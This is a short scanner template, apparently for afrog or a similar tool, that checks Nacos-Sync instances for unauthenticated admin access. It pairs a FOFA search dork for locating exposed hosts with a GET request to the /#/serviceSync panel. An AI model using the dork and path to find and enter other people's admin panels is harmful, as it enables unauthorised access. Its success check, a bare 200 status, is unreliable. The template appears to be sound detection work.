漏洞描述
FOFA: title="nacos" && title=="Nacos-Sync"
id: nacos-sync-login-bypass
info:
name: Nacos-Sync 未授权进后台
author: zan8in
severity: high
verified: true
description: |
FOFA: title="nacos" && title=="Nacos-Sync"
reference:
- https://mp.weixin.qq.com/s/SJf-ftbfni644diw_J94DA
tags: nacos-sync,nacos,bypass
created: 2023/08/09
rules:
r0:
request:
method: GET
path: /#/serviceSync
follow_redirects: true
expression: response.status == 200
expression: r0()